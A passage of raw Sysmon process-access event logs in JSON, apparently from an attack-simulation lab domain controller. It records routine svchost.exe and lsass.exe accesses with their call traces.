07:53:47.688","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2404,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.688\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.688","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2405,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.688\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.688","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2406,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.688\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.688","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2407,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.688\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.688","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2408,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.688\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1fb7a|C:\\Windows\\SYSTEM32\\samsrv.dll+5df1|C:\\Windows\\SYSTEM32\\samsrv.dll+5cf2|C:\\Windows\\SYSTEM32\\samsrv.dll+184ee|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.688","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1fb7a|C:\\Windows\\SYSTEM32\\samsrv.dll+5df1|C:\\Windows\\SYSTEM32\\samsrv.dll+5cf2|C:\\Windows\\SYSTEM32\\samsrv.dll+184ee|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2409,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.688\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.688","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2410,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.688\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.688","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2411,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.688\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 